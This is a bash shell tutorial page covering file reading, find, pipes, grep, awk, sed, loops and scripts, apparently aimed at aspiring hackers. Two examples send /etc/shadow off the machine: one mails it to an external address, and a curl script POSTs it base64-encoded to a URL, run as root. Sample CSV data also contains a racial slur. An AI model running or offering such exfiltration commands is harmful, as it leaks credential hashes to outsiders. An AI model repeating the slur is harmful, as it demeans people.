Questions about this topic? Sign up to ask in the talk tab.

Bash book

From NetSec
Jump to: navigation, search

The Bash Shell - Simple usage

Savitri says
This book has been published first in PDF form for the registered students of the Black Hat Academy. We are now releasing it free of charge on this platform for the greater benefit of everyone, as we are working on new versions. I hope you'll like it. Don't hesitate to comment or contribute in IRC.

Before we dive

Bash is an acronym for the Bourne Again Shell. An obvious pun on the born-again Christians, bash is GNU/Linux's de facto standard shell. Its syntax is very close to the korn shell's, another very much widespread Unix shell. You may have never encountered such terms, though, so let's start with some definitions. A shell, in this context, is a command-line shell, that is, an interface that stands between a user and an operating system, enabling interaction between them. Unlike the standard Windows graphical shell, however, every interaction goes through text commands.

A typical bash session could look like

 
sav@phiber ~ $ ls
l2  los
sav@phiber ~ $ vim .qmail
sav@phiber ~ $ irssi
sav@phiber ~ $ exit
 

The keyboard inputs are what's between the $ and the end of line. ls stands for “list” (as in “list files”), vim is a text editor, irssi is an IRC client, exit, well, exits the shell.

Bash can be used in two mode, interactive and non-interactive. In interactive mode, users input commands and these are executed as the user issues them. In non-interactive mode, programmers write programs, and then call them using parameters. The program will run, get input from somewhere else, be it a file, keyboard input, or another program, perform its operations, and exit.

Getting started

We won't get too much into Unix/Linux programs and will try, as far as it's possible, to stick to shell commands. When it's not possible (for example coming to filtering output), we will use standard Unix programs. We will be performing basic operations, like reading a file, writing to a file, reading input from the standard input, chaining programs together. This knowledge will make you proficient in using the Unix shell.

Reading a file

The Unix read file command is “cat”. It takes for parameter the names of the files to display. For example:

 
sav@phiber ~ $ cat /etc/motd
┏━┃┃ ┃┛┏━ ┏━┛┏━┃ ┏━┛┏━┃┏━ ━┏┛┃ ┃┏━┃┏━┛┃ ┃ ┃ ┃┏━┛
┏━┛┏━┃┃┏━┃┏━┛┏┏┛ ┃  ┏━┃┃ ┃ ┃ ┏━┃┏━┃┃  ┏┛  ┃ ┃━━┃
┛  ┛ ┛┛━━ ━━┛┛ ┛┛━━┛┛ ┛┛ ┛ ┛ ┛ ┛┛ ┛━━┛┛ ┛┛━━┛━━┛
 

(yes, it's ascii art, I made it with toilet) will display the file /etc/motd (“Message of the Day”, a Unix standard file that displays usually at logon).

To read a long file, we will use the “less” (or “more” if “less” is not available) command. more and less allow you to read through a file page by page, much like the MORE DOS command.

 
sav@phiber ~ $ more /proc/cpuinfo
 

To read the first lines of a file, we use “head”

 
sav@phiber ~ $ head -n 1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
 

To read the last lines of a file, we use “tail”

 
sav@phiber ~ $ tail -n 2 /etc/passwd
randomx:x:1004:1004::/home/randomx:/bin/false
randomy:x:1005:1005::/home/randomy:/bin/false
 

These two examples read the file /etc/passwd, which contains details about the different accounts on the system. We'll go further on this later on.

To read a whole file, skipping the first lines, we still use “tail”

 
sav@phiber ~ $ cat test.csv
name,address,phone,e-mail
joe biden,12 drunkard st.,+1-234-8888,joe@biden.net
barack obama,1 nigga ave.,+1-234-1337,admin@gov.us
joe frazier,3 boxing bd.,+1-234-0101,joe@nottheother.com
sav@phiber ~ $ tail -n +2 test.csv
joe biden,12 drunkard st.,+1-234-8888,joe@biden.net
barack obama,1 nigga ave.,+1-234-1337,admin@gov.us
joe frazier,3 boxing bd.,+1-234-0101,joe@nottheother.com
 

These basic commands are essential when you're into a system. They are used at every instant of your system life.

Navigating and searching through the filesystem

During prehistory and antiquity, there were no computers, so we didn't care much about computer filesystems. When the 60's and 70's came, mass, random access storage started to appear, and with that came the metaphor of files. Later on folders came into the equation, when storage became big enough to store a significant amount of data that needed to be sorted.

Most probably, if you're not an oldscene old timer, you've always lived with files and folders (or directories, which are the same). Often you will need to search for files with a certain name, or with a certain name pattern, or which contains certain data. But let's do simple things first, and navigate through the file system.

The Unix filesystem, for the scientific minded, is a particular kind of graph we call a tree. That is, it is a non-looping graph (unless we resolve symbolic links, which can, if taken in account, turn any tree into a graph). I suggest you search the net for Unix Tree / Linux Tree and look into Google Images. On the other hand, the Windows file system is not a tree but rather a set of trees, one tree for each “drive letter”.

To know where we are, we will use the pwd command. It stands for “print working directory”, that is, the directory in which we currently are.

 
sav@phiber ~ $ pwd
/home/sav
In order to navigate to other directories, we'll use the cd command.
sav@phiber ~ $ pwd
/home/sav
sav@phiber ~ $ cd ..
sav@phiber /home $ pwd
/home
sav@phiber /home $ cd /proc/self/
sav@phiber /proc/self $ pwd
/proc/self
sav@phiber /proc/self $ cd ../../tmp/
sav@phiber /tmp $ pwd
/tmp

A bit of explanation for all this. Historically in file systems, . stands for the current directory, which .. stands for the parent directory. So, basically, cd . would do nothing. cd .. navigates to the parent directory. These are what we call relative paths, that is, paths relative to the current position in the file system. On the other hand, cd /proc/self makes use of an absolute path. It's easily identified by its heading slash. cd /proc/self will always have the same outcome no matter what directory you are currently in.

cd ../../tmp/ is a longer relative path, which performs navigation two directory levels upwards, and then to the tmp directory.

Exercise: try to cd here and there, to existing directories and non-existing directories.

Searching for files and directories

There are two ways to search for files under Unix. The first one, using find walks through the file system, at a given start node, and searches under it. The second one, locate, maintains a database of existing files and searches through it, which is much quicker but requires regular maintainance.

Using find can be pretty awkward, especially for newcomers. We'll explain a simplified version. Its first argument shall be the path you'll be searching in. Then, we use several command-line switches to alter the behaviour of find. A complete guide can be found by typing “man find” into the console or in a Google searchbox.

In order to search for files whose name match a certain pattern, we will use the -name switch.

 
sav@phiber /tmp $ find /usr/share/ -name '*.sh'
/usr/share/git/contrib/fast-import/git-import.sh
/usr/share/git/contrib/ciabot/ciabot.sh
/usr/share/git/contrib/rerere-train.sh
/usr/share/git/contrib/remotes2config.sh
/usr/share/vim/vim73/macros/less.sh
 

searches for all files whose name match the '*.sh' pattern, that is, any file whose name ends with .sh. In order to search for all files belonging to user sav, we will use the -user switch

 
sav@phiber ~ $ find /home/sav/ -user sav
/home/sav/
/home/sav/l2
/home/sav/los
/home/sav/.ssh
/home/sav/.bashrc
/home/sav/.bash_logout
/home/sav/test.csv
/home/sav/.viminfo
 

There are many other possibilities, find is a very rich tool, and here comes an exercise.

Build the commands to:

  • Find all SUID bit binaries in /usr
  • Find all files belonging to user root in the /home directory.
  • Find all files modified less than a week ago (huge hint: this one can be “touch”y)
  • Find all executable files (not directories) in /usr/share
  • Find all .txt files, and all .h files, in the filesystem.

and provide us with output.

Using locate is much easier. First, from time to time, run the updatedb command as user root Then, type locate 'pattern' and you will be given a list of files.

Advanced find use

find is a power tool for any Unix administrators. Its ability to find files matching certain properties covers about 100% of all the needs you'll ever have. With find you can chain conditions, negate them. For example, try to build a command that finds all files created less than 7 days ago but more than 1 day ago (tip: use first touch -d “7 days ago” /tmp/marker)

Combining find with xargs

Typically we will use find with the -print0 option (to have a NULL separator instead of a whitespace or new line) and we'll use xargs with the -0 option. This rules out all the whitespace and quotes-in-file-names issues. Use it with the -L option, the -n option. An example:

 
find . -type f | xargs -n 30 md5sum
 

will pass md5sum 30 arguments each time

Executing several commands in a row

In order to execute several commands in a row, we will usually use a semicolon (“;”) between each instruction. This will execute programs one after the other no matter the result of the programs are. If a program fails, then the next program starts running. Example:

 
sav@phiber ~ $ head -n 1 /etc/shadow; head -n 1 /etc/passwd
head: cannot open '/etc/shadow' for reading: Permission denied
root:x:0:0:root:/root:/bin/bash
 

In some situations, for example when checking for dependencies using “configure” before building and installing a program, this kind of chaining can be misfit. Indeed, we cannot proceed with the build or installation if the previous step has failed.

So, to go forward if and only if the programs succeed, we use the “&&” (AND) operator.

Example:

 
sav@phiber ~ $ head -n 1 /etc/shadow && head -n 1 /etc/passwd
head: cannot open '/etc/shadow' for reading: Permission denied
 

In other situations, we may want to execute a command only if another has failed. For this, we use the “||” (OR) operator

Example:

 
sav@phiber ~ $ head -n /etc/shadow || echo "Cannot read shadow file :( exploit haz failed :((((("
head: /etc/shadow: invalid number of lines
Cannot read shadow file :( exploit haz failed :(((((
 

Chaining programs

Sometimes we may want to take the output of a program and further refine it, for example when searching for a big number of files. In that case, we may want to be able to read the output of the find or locate command with the help of the less or more program.

In the Unix philosophy basically everything is a file. Block devices, keyboard, sound card, RAM, everything's a file really. For programs, each of them has at least 1 input “file” (often wired to the input terminal) and 2 output “files”, wired to two channels of the terminal by default, too. Each of these file descriptors is numbered, from 0 to 2. 0 is the standard input (STDIN), 1 is the standard output (STDOUT) and 2 is the error channel (STDERR). When errors occur they are normally, for standard-respectful programs, written on the error channel.

Many file manipulation standard programs, when not given a file name, will take their input from the STDIN. This allows, you will have guessed it, for seamless program chaining.

So, for the proposed example, try:

 
sav@phiber ~ $ find /etc/ -name '*.conf' | less
 

The | is a “pipe”. On QWERTY keyboards it's situated on the rightmost part of the keyboard, next to the Enter/Return key. On Mac keyboards, it's typed using Apple+Alt+L. On other keyboards, check it for yourself. You will need that symbol basically every second you type in a Linux/Unix terminal.

Programs chains can be virtually unlimited in length. Something like

 
sav@phiber ~ $ find /etc/ -name '*.conf' | tail -n 10 | head -n 2 | sort | uniq
 

with 5 programs in a chain is pretty common. Unix uses and abuses of this, and so should you.

Writing to files

The output of any command can be redirected to a file using the right-pointing angle bracket sign. An example will be more explicit :

 
sav@phiber ~ $ head -n 4 /proc/cpuinfo > /tmp/test
sav@phiber ~ $ cat /tmp/test
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 23
 

When using the simple right-pointing angle bracket without any option, the errors spawned will not be stored into the target file. In order to log them, we need to redirect STDERR to STDOUT. For this, we use the 2>&1 instruction, which tells the shell to redirect channel 2 (2, STDERR) to channel 1 (&1, STDOUT). This way, the errors will be displayed in the same channel as the standard messages and thus can be stored in a log file.

For example:

 
sav@phiber ~ $ find /etc/skel/ -name foo > /tmp/test
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
sav@phiber ~ $ cat /tmp/test
sav@phiber ~ $
and now
sav@phiber ~ $ find /etc/skel/ -name foo > /tmp/test 2>&1
sav@phiber ~ $ cat /tmp/test
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
 

You shall always specify the file descriptors redirections AFTER any standard output file redirection. You may want to log output to a file which keeping standard display on the terminal. Chaining your program to tee will help you do so

 
sav@phiber ~ $ find /etc/skel/ -name '*foo*' 2>&1 | tee  /tmp/log.txt
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
sav@phiber ~ $ cat /tmp/log.txt
find: '/etc/skel/.ssh': Permission denied
find: '/etc/skel/.maildir': Permission denied
 

As you can see, the output is both copied to stdout and written to the file passed as argument. Remember tee as a “Golf Tee” or T pipe, which takes one input and splits it in two flows, one to a file, one to stdout. Tee can be used to keep “raw”, unfiltered data in files while not breaking the processing chain. We are done with the basic tools, and can now start to learn more advanced uses of the Unix/Linux shell, especially of bash.


Back on board

In this chapter, you have learned how to use the basic functionalities of a common Unix shell. This knowledge applies primarily to bash but can be applied to virtually any POSIX standard shell. We tried to put real worlds examples into this course, but the best examples will be reading and processing data you actually need. So practice, practice and practice. Soon we will move on to a more advanced level, that will allow you to write more complete bash programs.

Advanced use, loops, stream editing, shell programs

Before we dive

In the previous lesson, we have studied basic I/O with bash and a small bunch of Unix programs.

Advanced bash

Sorting and removing duplicates

When reading a file, we may want to sort and remove duplicate lines. For this purpose we will be using two tools, often in a chain: sort and uniq. sort will, well, sort its input using a given rule (numerically, in dictionary order, standard or reverse). All its options can be found in its user manual. Basic options are -n (sort numerically), -d (sort by dictionary order), -r (reverse the output).

uniq will remove consecutive identical lines. Most often it will be used without any option, but It has a bunch of options that can make it useful for other purposes. man uniq will give you all directions to using it.

Example: try

 
sav@phiber ~ $ cat /proc/cpuinfo | sort -d | uniq
 

and compare it to

 
sav@phiber ~ $ cat /proc/cpuinfo | sort -d 
 

and

 
sav@phiber ~ $ cat /proc/cpuinfo
 

Filtering output

Quite often programs or files will have contents we need and contents we don't need at all. In order to optimize our work flow, and more specifically when feeding programs with each other, it is very useful to keep only data we need.

In order to filter, we will be using grep and its variants, egrep mainly.

 
sav@phiber ~ $ grep bogomips /proc/cpuinfo
bogomips        : 3200.47
bogomips        : 3200.30
bogomips        : 3198.95
bogomips        : 3200.50
 

This searches for the string “bogomips” into /proc/cpuinfo. Since our system is quad-core, we get 4 outputs, and nothing else. Compare to cat /proc/cpuinfo. If we are to search for more complex strings, we may use the power of regular expressions.

For example, we may want to keep only lines starting with a lowercase consonant, for obscure reasons.

Try this on your system:

 
sav@phiber ~ $ grep '^[bcdfghjklmnpqrstvzwx]' /proc/cpuinfo 
 

and compare the output to

 
sav@phiber ~ $ cat /proc/cpuinfo
 

Regular expressions are quite a large topic. We invite you to read on them some of the starter you will find on the Internet. Basically, the caret before the rest means “anything starting with”. The square brackets are class delimiters: all that is inside it is part of a user-defined character class. Character classes are recursive. We may define a character class with “anything but some characters”. Character ranges can be defined using a standard hyphen. Some pre-defined character classes are defined in certain implementations.

Your best option, since this is a very wide topic, is to read basic tutorials on the Internet and start from there. In general when searching for common data (grepping e-mail addresses or phone numbers) a regular expression (or “regexp / regex”) will be available.

grep output can be reversed, that is, only non-matching lines will be displayed. It is useful for filtering garbage out. A typical example is grep -v '^$', which removes empty lines, or grep -v '^#', which removes comment lines, starting with a #.

As all standard Unix programs, when not given a file name, grep will take the standard input as its data.

grep and variants have a big limitation: only whole lines can be displayed.

Displaying only part of lines

grep does part of the filtering job, but on its own it is quite often non-sufficient. Indeed, if we only need one part of a line, or don't need some, grep can't do anything for us.

That's where the basic utility cut and the power tool, inline programming language, Awk get in action.

cut takes two parameters, a delimiter and a field number. It will split each line of its input using the given delimiter and display the 1-indexed field it is given in parameter.

Example: display shells in use in the system

 
sav@phiber ~ $ grep -v /bin/false  /etc/passwd | cut -d: -f7 | sort |uniq
/bin/bash
/bin/sync
/sbin/halt
/sbin/nologin
/sbin/shutdown
 

compare to

 
sav@phiber ~ $ cat /etc/passwd
 

But what if we want to display two fields. With cut, this is not a possible option. So, for this purpose, we will be using a bigger, more powerful tool, awk. Awk includes grep-like regexp, character-based field-separation, printing format output. When using it we have two options:

  • Give it grep-prepared input and use it only as a formatter
  • Use it alone, levering more of its power.

Awk will usually take the -F argument when the delimiter is not empty space. Typically for colon-separated values, -F: will be used. Notice there's no space between the F and the colon.

Let's say we want to display user names and shells of all accounts residing in /home. Compare the output of these two commands

 
sav@phiber ~ $ grep '/home' /etc/passwd | awk -F: '{ print $1" "$7}'
hatter /bin/bash
sav /bin/bash
xochipilli /bin/bash
sav@phiber ~ $ awk -F: '/\/home/ { print $1" "$7}' /etc/passwd
hatter /bin/bash
sav /bin/bash
xochipilli /bin/bash
 

The slash just before home is preceded by a backslash. This practice is called “escaping”, and it allows for the value following it to be interpreted as a literal string and not a modifier by awk.

Awk works using code blocks. Code blocks are delimited by curly brackets. They are executed if the optional match condition put before them is true. In our first example, there is no condition, so all lines will be treated. This is because we perform filtering with grep first. In our second example, the condition is the validation of the regular expression (which are, in the awk standard, delimited by slashes) /home, that is, any line containing /home.

Comparing the two examples, we may think that using the Awk regex method is more complex and could be avoided. However, when it comes to more complex algorithms, we don't want this.

Let's say we want to display usernames for /home based users and display an alarm for users whose home directory is under the /var filesystem. Using grep as a filter, we will have a hard time performing the task, having to re-read the input twice and make two different awk filters. Using a awk one-liner, this is much more clear and we have more formatting options

Test this:

 
sav@phiber ~ $ awk -F: '/\/home/ { print "user: "$1} /\/var/ { print "Hmm, "$1" is located in /var"}' /etc/passwd
 

However, this example is still not perfect. We'd like to refine our output and display the alert only if the /var based user shells is not /sbin/nologin (that is, the account is potentially a usable account)

 
awk -F: '/\/home/ { print "user: "$1} (/\/var/ && $7!="/sbin/nologin") { print "Hmm, "$1" is located in /var"}' /etc/passwd
 

The && is a logical AND condition, that is, the expression will validate if and only if both conditions in the parenthesis are true.

Statistics on the output

We will not be diving in complex statistics on the output. Usually, we will want to know how many lines there is in the output, to give us an idea of the order of magnitude of processing time we will need after getting our data. The wc (as in word count) tool is the way to go for this.

Chaining | wc at the end of a program will suppress all its output and give us instead statistics about the number of words, lines and characters in the data it got. For complete information about wc, feel free to check its manual (man wc).

 
sav@phiber ~ $ awk -F: '/\/home/ { print "user: "$1} (/\/var/ && $7!="/sbin/nologin") { print "Hmm, "$1" is located in /var"}' /etc/passwd | wc
     13      50     267
 

This is not very much refined. In order to get the number of lines, we could use awk and print only the first field. However, this would be bloated. Rather, we will use wc's command line switches.

  • Piping wc -c will count the number of characters.
  • Piping wc -w will count the number of words
  • Piping wc -l will count the number of lines

Most often, the number of lines will be what interests us. So, refined example:

 
sav@phiber ~ $ awk -F: '/\/home/ { print "user: "$1} (/\/var/ && $7!="/sbin/nologin") { print "Hmm, "$1" is located in /var"}' /etc/passwd | wc -l
13
 

The output is much cleaner.

Variables, loops and conditional statements

Bash has three kind of loops. The while loop takes a condition as parameter and continues its execution until the condition is false. The for loop, on the other hand, takes a series of inputs and does its work for every member of the loop. As for the data range loop, it is quite particular in that it can only take a single instruction, and is in general a stub for using other loops.

Conditional statements in bash make use of the test internal bash utility. man test gives us many indications on the different boolean tests it is possible to perform. We will demonstrate its use with a few examples. This part of the chapter will also be the occasion to get in contact with the $() operator. As for variables, they store data in buffers (temporary memory) for later use, in the form of strings.

Variables

Two basic operations are possible on variables: assigning them and reading them. Assigning means “storing a value in a variable”. Reading is retrieving the contents of the variable.

A variable has a name and a value. Usually in bash, explicit (user-declared variables) will have UPPERCASE identifiers. The variable access operator is ${}, shortened often to $. When ${} is not explicitly needed, that is, when the variable value will not have to be stuck to other data, we will prefer to use the $ operator. When there is a need for absolutely no ambiguity in an ambiguous context, we will use the full ${} syntax.

All this may sound quite abstract but an example will make it all explicit:

 
sav@phiber ~ $ MY_NAME="Savitri"
sav@phiber ~ $ MY_MAIL="[email protected]"
sav@phiber ~ $ echo "Hello, my name is ${MY_NAME} and my e-mail address is ${MY_MAIL}"
Hello, my name is Savitri and my e-mail address is sav@canthack.us
sav@phiber ~ $ echo "Hello, my name is $MY_NAME and my e-mail address is $MY_MAIL"
Hello, my name is Savitri and my e-mail address is sav@canthack.us
 

Variables can store numeric values, and it is possible to perform basic integer arithmetic using the $(()) operator. Don't confuse this operator with $()

Example (the very classical and academic Fibonacci suite linear implementation):

 
sav@phiber ~ $ FIB1=1; FIB2=1; B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
2
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
3
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
5
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
8
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
13
sav@phiber ~ $ B=$FIB1; FIB1=$FIB2; FIB2=$(($B+$FIB1)); echo $FIB2;
21
 

Remember, the Fibonacci suite is defined by F(n) = F(n-1) + F(n-2), with F(0) = 1 and F(1) = 1. We can also assign to variables the output of programs. For this, we will make use of the $() operator.

 
sav@phiber ~ $ SAV_LINE=$(grep /home/sav /etc/passwd)
sav@phiber ~ $ echo "Sav's line is: $SAV_LINE"
Sav's line is: sav:x:1024:1024::/home/sav:/bin/bash

This allows for storage of filtered output for further use. Often we will store in a variable the output of a chain of programs trailed by a wc -l, which will be either zero or non-zero.

Variables can be set programmatically or can be stdin input. In order to read data from the user, we use the read utility.

Try this example:

 
sav@phiber ~ $ echo -n "What's your name?> "; \
read name; echo -n "How old are you?> "; read age; \
echo -n "Where d'ya go to school?> "; read school; \
echo "Ok, $name. You're $age and go to $school. Now that we know each other just a little bit better,\
why won't you come over here, and make me feel all right?"
 

User input is stored in variables name, age, and school. They are later accessed and displayed in a glorious fashion, using the $ operator.

Conditional statements

Conditional statements allow to write sub-programs that will execute only if certain conditions are met. These conditions are tested, if they validate, then a block of code is executed, and optionally if they don't validate, another block of code is executed.

The tests can be equality test, superiority/inferiority tests, emptiness or non-emptiness tests, file existence and file “type” tests. All tests are listed in “man test”.

Before we see some examples, let's introduce the $() operator. It captures the output of the command-line given inside the parenthesis, and returns it as a string, which can be used, for example for testing.

For example, we can test if a program outputs more than 5 lines, display “more than 5” if there's more than 5 lines, and “less than or exactly 5” otherwise.

 
sav@phiber ~ $ if [ $(grep bash /etc/passwd | wc -l) -gt 5 ]; then echo "more than 5"; else echo "less than or exactly 5"; fi
more than 5
 

It's important to put spaces between the values and the square brackets when testing. The general syntax for conditional statements is:

 
if [ conditions ]; then block_of_code_true; else block_of_code_false; fi
 

Reminder: blocks of code are instructions separated by semicolons or other program chaining operators (|, &&, ||).

As for implementation, the test program, called implicitly when using the square brackets, has a success exit status when the test validates, and a failure exit status otherwise. This can be useful when testing success of programs.

Unix provides us with two near-standard utilities: true and false. true simply returns EXIT_SUCCESS (0) and false returns EXIT_FAILURE (1 or more, depending on system). This allows for demonstrative constructs like:

 
sav@scorpion ~ $ if true; then echo hello; else echo goodbye; fi;
hello
sav@scorpion ~ $ if false; then echo hello; else echo goodbye; fi;
goodbye
 

or more realistic error handling:

 
sav@scorpion ~ $ if cat /etc/shadow; then echo "Victory"; cat /etc/shadow | mail -s "Shadow" exploit@yay.us; else echo "Failure :("; uname -a ; fi;
cat: /etc/shadow: Permission denied
Failure :(
Linux hardcore 2.6.42-hardened #3 SMP Mon Jun 27 17:54:00 GMT 2011 i686 Intel(R) Phenom(R) CPU A6608@ 8.00GHz FakeIntel GNU/Linux
 

Data ranges

Bash has short hands for most common, ASCII or number based data ranges. Data ranges are curly brackets delimited and are in the form {starter..ender}. They can be ascending or descending.

Examples:

 
sav@phiber ~ $ echo {z..a}
z y x w v u t s r q p o n m l k j i h g f e d c b a
sav@phiber ~ $ echo {1..88}mph
1mph 2mph 3mph 4mph [] 83mph 84mph 85mph 86mph 87mph 88mph
 

If there are spaces between the range and the following or preceding texts, they need to be backward-slash escaped, as in :

 
sav@phiber ~ $ echo Lets\ reach\ {1..88}\ mph
 

The for loop

The for loops is ideal for simple, word based data treatment. It will take a given input string, split it into words (based on an environment defined separator, IFS, “Internal Field Separator”, by default blank space), and enumerate through these words.

A trivial example: list all CSV files in a directory print a line for each found, and display its first line.

 
sav@phiber ~ $ for i in *.csv; do echo "Found CSV:" $i; head -n 1 $i; done
Found CSV: test.csv
name,address,phone,e-mail
 

From this basic example, we can build up more complex loops. We will make quite often use of the $() operator, which allows for looping on complex programs output. A complete example:

 
sav@phiber ~ $ for i in $(mount | awk '{print $3}' | sort | uniq); do echo "Mount point: $i"; du -x --max-depth=0 $i; done
 

Run this on your own installation. This enumerates through all mounted file systems and displays the global disk space usage on each of them. Try:

 
sav@phiber ~ $ mount | awk '{print $3}' | sort | uniq
 

then

 
sav@phiber ~ $ for i in $(mount | awk '{print $3}' | sort | uniq); do echo "Mount point: $i"; done
 

and then see our first example for the completed task.

We can sum up the syntax of the for loop, now:

 
for variable_name in list_of_values; do code_block; done
 

The for loop is the most used loop when it comes to data processing.

The while loop

The while loop, by contrast to the for loop, executes its inner while a condition (identical to the ones met in the “if” conditional statements section) is true.

Typically, it will be used to wait for a condition to occur, or to repeatedly do something until a certain event occurs or the user interrupts the program.

With the while loop, the true utility gets more useful. Indeed, since it will always be true, and is very quick to execute, it's ideal for bash programs perpetually executing, for example, a program that will check whether a network interface is connected, and if it isn't, will light lights and sound alarms to request intervention from an administrator.

But first, let's perform an implementation of the Fibonacci suite using the while loop.

 
sav@phiber ~ $ FIB1=1;\
FIB2=1;\
I=2;\
 while true; do B=$FIB1;
FIB1=$FIB2;
FIB2=$(($B+$FIB1));
echo "Fib(${I}) = $FIB2"; I=$(($I+1)); 
sleep 1; 
done;
Fib(2) = 2
Fib(3) = 3
Fib(4) = 5
Fib(5) = 8
Fib(6) = 13
Fib(7) = 21
Fib(8) = 34
[...]
 

In this example we introduce the “sleep” utility, that will wait for the given number of seconds before exiting and letting the program flow continue: very useful when generating a lot of human readable output.

This loop has no end, only exiting the program using the ^C (Control+c) command chord will stop it.

We can also make use of “read” to feed our while loop. Indeed, when read is fed with no data, it will exit with a failure code, and thus the loop will stop. This makes the following example possible:

 
sav@phiber ~ $ I=1; cat /proc/cpuinfo | while read line; do echo -n "Line ${I}> "; echo $line; I=$(($I+1)); done
Line 1> processor : 0
Line 2> vendor_id : GenuineIntel
Line 3> cpu family : 6
Line 4> model : 23
Line 5> model name : Intel(R) Xeon(R) CPU E5405 @ 2.00GHz
Line 6> stepping : 6
Line 7> cpu MHz : 1599.832
[]
Line 28> power management:
Line 29>
sav@scorpion ~ $
 

When data becomes void (EOT, End Of Transmission), read exits with a failure code, and stops.

Stream editing

Until now, we have been handling data by reading it, storing it and using tools like cut or awk to transform then and format them. This method has the advantage of apparent simplicity, but can be problematic for two reasons.

First, its simplicity is only apparent. In order to process complex tasks, it is necessary to store intermediate results in buffer files or variables, making the programs messy.

Second, when it comes to brute performance, these operations mean spawning one or more programs for each line of input, making a huge number of I/O operations. Stream editing is another approach to file processing. It transforms data in real time, based on substitution patterns, and allows for light speed edits on big files. An example of loop editing vs stream editing. The “loops” example is a typical “you're doing it wrong”, while the stream editing example is concise and elegant.

Let's say we want to replace all occurrences of “hatter” by “sav” in a given file.

The awk wrong way (generated using clever metaprogramming, don't worry for my keyboard), assuming there's at most 5 words per line:

 
sav@phiber ~ $ awk -F: '($1 == "hatter") { print "sav "$2" "$3" "$4" "$5 ; next;}\
($2 == "hatter") { print $1" sav " "$3" "$4" "$5 ;next;}\
($3 == "hatter") { print $1" "$2" sav "$4" "$5;next; }\
($4 == "hatter") { print $1" "$2" "$3" sav "$5;next; }\
($5 == "hatter") { print "sav " "$2" "$3" "$4" sav";next; }\
{ print $0} ' /etc/passwd | grep sav
sav x 1000 1000
sav:x:1002:1002::/home/sav:/bin/bash
 

The stream editing method, concise and accurate:

 
sav@phiber ~ $ sed s/hatter/sav/g /etc/passwd | grep sav
sav:x:1000:1000::/home/sav:/bin/bash
sav:x:1002:1002::/home/sav:/bin/bash
 

Stream editing is used by most system administrators as a super power tool. It is able to transform data in-place using the power of regular expressions. This allows for seamless editing of complex files, which would take, manually or by other means of programming, hours to achieve. sed and grep, associated to sort and uniq, are tools a system administrator will need on a daily basis. You, as a future advanced Unix user, will need them aswell. We urge you to read more or regular expressions if you didn't already. This will be of constant use in your Unix life.

Writing programs in bash

All the programs we have been writing up to this point are one-liner programs, typed interactively in the shell. As you may have noticed, the power of bash and the shell tools is quite extended. It might be useful to store some common use code performing tasks we will often have to execute. Such programs are stored into script files, that is, plain text files containing bash code.

Using script files, the readability of our code is improved: indeed, we can add comments (starting with a # pound sign) to code, break lines at the end of commands, and make use of indentation to mark code blocks visually. In addition, we can define sub-programs under the form of functions.

Now spawn a text editor of your choice to edit a gloria.sh file. Put this contents inside:

 
#!/bin/bash
# gloria.sh – Glorifies Jim Morrisson
 
echo -n "What's your name?> "
read name
echo -n "How old are you?> "
read age
echo -n "Where d'ya go to school?> "
read school
# now display the big thing!!
echo "Ok, $name. You're $age and go to $school. Now that we know each a little bit better, why won't you come over here, and make me feel all right?"
 

Save and close it. Set the execution bit on it (chmod +x gloria.sh) and execute it (./gloria.sh). See the output.

Passing arguments to programs

Bash programs are very useful, but they will be more useful if they can take arguments.

There are several ways to pass arguments to programs. The most antique way of doing it is setting environment variables when calling the program, and rely on these to get our parameters. Environment variables are accessed in the program as any programmatically-set variable. This allows for explicit parameters when a user has to set them before running the app. For scripts that will be called by a user directly with complex parameters, it is one of the best options, if not the best : there's no way the user will get mistaken in parameter orders as he would be with traditional command-line “switches”. On the programmer's side, it's very simple to parse: there's no parsing to be done, the variables are accessed directly.

On the downside, it lacks flexibility when calling programs in series, or when a program calls another program. In addition, it may cripple the environment variables if there are too much of them set.

Example (put this in ex1.sh, and run it)

 
#!/bin/sh
curl -d "data=$(cat $THEFILE | base64 -w 0)" $THEURL
 

This small program base64-encodes a file and HTTP POSTs it to a URL. It may be called like (run this as root)

 
THEFILE=/etc/shadow THEURL=http://scorpion.canthack.us/~sav/info.php ./ex1.sh
 

(all in a line)

The other, most common way to pass arguments, is to use “usual style” arguments, that is, switches that come after the command line. Unfortunately, using bash, we don't have all the facilities we have using C with lib readline, for example. So we will have to rely on positional parameters unless we implement a complex parser testing an argument and its neighbour to parse the switches.

The best option, for bash programs, is to set that first argument is such, second argument is such other, and so on.

Such positional arguments are accessed through specific variables named $1 (for the first argument), $2 (second argument), and this follows. This ends at $9. If you want to access more than 10 parameters, you have to use the shift command. shift X offsets (“shifts”) arguments by X positions. So, shift 1 would move $2 to $1, $3 to $2 and so on.

The complete set of arguments is contained in variable $@. The number of arguments in contained into variable $#.

Defining functions and calling them

Now it is time to learn how to define functions in bash. Think of functions as sub-programs contained into the same file as a main program. They work exactly the same. A function contains a body, that is, its code, and can take arguments, accessed just like arguments of a program.

Any code can be put in a function, but it is advised to use them for tasks that you will have to run often in your program. This allows for avoiding of copy-pasta or “copy/pasted code blocks”, which is a very nasty syndrome of ancient times programmers.

For example, imagine that you want to give the IP address of a network interface through a program, this program's purpose being to being used by another program for its input.

There are two possible approaches, both are right, but one is more practical when the code finds little to no use outside of the aforementioned “another program”.

The first way is to put the small snippet into a text file and call it using its path, from the other program. This is typical of what you have been doing until now, so we won't provide an example.

The second way is to take the code, wrap it into a function in the same code file as the program, and to call this function by its name. An example is provided here (one important thing is not to forget the semicolon at the end of each instruction).

 
#!/bin/bash
function getIpAddr {
ip addr ls $1 | grep inet | awk '{print $2}';
}
 
getIpAddr eth0
 

If you have a big bunch of functions, you can put them apart in a file separated from your main logic, and load this file with the source bash command, which takes a file and integrates its outcome to the execution environment.

Homework

Write a function in bash that, given the name of an argument and the whole list of arguments, returns the value of the argument.

